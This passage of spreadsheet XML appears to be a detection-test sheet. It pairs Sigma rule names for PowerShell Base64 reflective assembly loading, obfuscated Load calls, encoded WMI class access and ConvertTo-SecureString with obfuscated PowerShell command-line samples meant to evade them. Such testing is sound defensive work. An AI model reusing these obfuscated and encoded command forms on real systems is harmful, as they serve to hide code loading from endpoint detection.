      </c>
      <c r="K34" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="35" ht="15.75" customHeight="1" s="42">
      <c r="A35" s="43" t="n"/>
      <c r="B35" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C35" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D35" s="44" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E35" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F35" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G35" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H35" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I35" s="43" t="n"/>
      <c r="J35" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K35" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="36" ht="15.75" customHeight="1" s="42">
      <c r="A36" s="43" t="n"/>
      <c r="B36" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C36" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D36" s="44" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E36" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ENcODEDCOmmAnD WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F36" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G36" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H36" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I36" s="43" t="n"/>
      <c r="J36" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K36" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="37" ht="15.75" customHeight="1" s="42">
      <c r="A37" s="43" t="n"/>
      <c r="B37" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C37" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D37" s="44" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E37" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ENCodEdCOmMand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F37" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G37" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H37" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I37" s="43" t="n"/>
      <c r="J37" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K37" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" s="42">
      <c r="A38" s="43" t="n"/>
      <c r="B38" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C38" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D38" s="44" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E38" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EnCoDEDCoMMAND WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F38" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G38" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H38" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I38" s="43" t="n"/>
      <c r="J38" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K38" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" s="42">
      <c r="A39" s="43" t="n"/>
      <c r="B39" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C39" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D39" s="44" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E39" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[Reflection.Assembly]::('L'+'o'+'ad').Invoke($data)"</t>
        </is>
      </c>
      <c r="F39" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G39" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H39" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I39" s="43" t="n"/>
      <c r="J39" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K39" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" s="42">
      <c r="A40" s="43" t="n"/>
      <c r="B40" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C40" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D40" s="44" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E40" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Reflection.Assembly]::(\"{1}{0}\" -f 'oad','L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F40" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G40" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H40" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I40" s="43" t="n"/>
      <c r="J40" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K40" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" s="42">
      <c r="A41" s="43" t="n"/>
      <c r="B41" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C41" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D41" s="44" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E41" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "[Reflection.Assembly]::(\" {1}{0}\" -F 'oad' ,'L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F41" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G41" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H41" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I41" s="43" t="n"/>
      <c r="J41" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K41" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" s="42">
      <c r="A42" s="43" t="n"/>
      <c r="B42" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C42" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D42" s="44" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E42" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMMANd "[Reflection.Assembly]::(\" {1}{0}\" -F 'oad' ,'L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F42" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G42" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H42" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I42" s="43" t="n"/>
      <c r="J42" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K42" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" s="42">
      <c r="A43" s="43" t="n"/>
      <c r="B43" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C43" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D43" s="44" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E43" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[Reflection.Assembly]::(\" {1}{0}\" -F 'oad' ,'L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F43" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G43" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H43" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I43" s="43" t="n"/>
      <c r="J43" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K43" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="44" ht="15.75" customHeight="1" s="42">
      <c r="A44" s="43" t="n"/>
      <c r="B44" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C44" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D44" s="44" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E44" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMMaNd "[Reflection.Assembly]::(\" {1}{0}\" -f 'oad' ,'L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F44" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G44" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H44" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I44" s="43" t="n"/>
      <c r="J44" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K44" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" s="42">
      <c r="A45" s="43" t="n"/>
      <c r="B45" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C45" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D45" s="44" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E45" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[Reflection.Assembly]::(\" {1}{0}\" -F 'oad' ,'L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F45" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G45" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H45" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I45" s="43" t="n"/>
      <c r="J45" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K45" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" s="42">
      <c r="A46" s="43" t="n"/>
      <c r="B46" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C46" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D46" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E46" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$w='Win32\_'; $p='Process'; Get-CimInstance -ClassName ($w+$p)"</t>
        </is>
      </c>
      <c r="F46" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G46" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H46" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I46" s="44" t="n"/>
      <c r="J46" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K46" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" s="42">
      <c r="A47" s="43" t="n"/>
      <c r="B47" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C47" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D47" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E47" s="4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47" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G47" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H47" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I47" s="44" t="n"/>
      <c r="J47" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K47" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" s="42">
      <c r="A48" s="43" t="n"/>
      <c r="B48" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C48" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D48" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E48" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Get-WmiObject -Class ([char[]](https://www.google.com/search?q=87,105,110,51,50,95,80,114,111,99,101,115,115) -join '')"</t>
        </is>
      </c>
      <c r="F48" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G48" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H48" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I48" s="44" t="n"/>
      <c r="J48" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K48" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" s="42">
      <c r="A49" s="43" t="n"/>
      <c r="B49" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C49" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D49" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E49" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-WmiObject -Class ([char[]](https://www.google.com/search?q=87,105,110,51,50,95,80,114,111,99,101,115,115) -join '')"</t>
        </is>
      </c>
      <c r="F49" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G49" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H49" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I49" s="44" t="n"/>
      <c r="J49" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K49" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" s="42">
      <c r="A50" s="43" t="n"/>
      <c r="B50" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C50" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D50" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E50" s="4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50" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G50" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H50" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I50" s="43" t="n"/>
      <c r="J50" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K50" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" s="42">
      <c r="A51" s="43" t="n"/>
      <c r="B51" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C51" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D51" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E51" s="4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51" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G51" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H51" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I51" s="44" t="n"/>
      <c r="J51" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K51" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" s="42">
      <c r="A52" s="43" t="n"/>
      <c r="B52" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C52" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D52" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E52" s="4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52" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G52" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H52" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I52" s="44" t="n"/>
      <c r="J52" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K52" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="53" ht="15.75" customHeight="1" s="42">
      <c r="A53" s="43" t="n"/>
      <c r="B53" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C53" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D53" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E53" s="4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F53" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G53" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H53" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I53" s="44" t="n"/>
      <c r="J53" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K53" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" s="42">
      <c r="A54" s="43" t="n"/>
      <c r="B54" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C54" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D54" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E54" s="4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F54" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G54" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H54" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I54" s="44" t="n"/>
      <c r="J54" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K54" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" s="42">
      <c r="A55" s="43" t="n"/>
      <c r="B55" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C55" s="44" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D55" s="44" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E55" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F55" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G55" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H55" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I55" s="43" t="n"/>
      <c r="J55" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K55" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" s="42">
      <c r="A56" s="43" t="n"/>
      <c r="B56" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C56" s="44" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D56" s="44" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E56" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F56" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G56" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H56" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I56" s="43" t="n"/>
      <c r="J56" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K56" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="57" ht="15.75" customHeight="1" s="42">
      <c r="A57" s="43" t="n"/>
      <c r="B57" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C57" s="44" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D57" s="44" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E57" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncODEDCommand Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F57" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G57" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H57" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I57" s="43" t="n"/>
      <c r="J57" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K57" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="58" ht="15.75" customHeight="1" s="42">
      <c r="A58" s="43" t="n"/>
      <c r="B58" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C58" s="44" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D58" s="44" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E58" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eNcodEDCOmManD Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F58" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G58" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H58" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I58" s="43" t="n"/>
      <c r="J58" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K58" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="59" ht="15.75" customHeight="1" s="42">
      <c r="A59" s="43" t="n"/>
      <c r="B59" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C59" s="44" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D59" s="44" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E59" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enc Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F59" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G59" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H59" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I59" s="43" t="n"/>
      <c r="J59" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K59" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="60" ht="15.75" customHeight="1" s="42">
      <c r="A60" s="43" t="n"/>
      <c r="B60" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C60" s="44" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D60" s="44" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E60" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enCOdEDCOMMaNd Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F60" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G60" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H60" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I60" s="43" t="n"/>
      <c r="J60" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K60" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="61" ht="15.75" customHeight="1" s="42">
      <c r="A61" s="43" t="n"/>
      <c r="B61" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C61" s="44" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D61" s="44" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E61" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$a='ConvertTo-'; $b='SecureString'; $c=$a+$b; &amp;$c -String 'MySecret' -AsPlainText -Force"</t>
        </is>
      </c>
      <c r="F61" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G61" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H61" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I61" s="43" t="n"/>
      <c r="J61" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K61" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="62" ht="15.75" customHeight="1" s="42">
      <c r="A62" s="43" t="n"/>
      <c r="B62" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C62" s="44" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D62" s="44" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E62" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$a='ConvertTo-'; $b='SecureString'; $c=$a+$b; &amp;$c -String 'MySecret' -AsPlainText -Force"</t>
        </is>
      </c>
      <c r="F62" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G62" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H62" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I62" s="44" t="n"/>
      <c r="J62" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K62" s="44" t="b">
        <v>0</v>
      </c>
    </row>
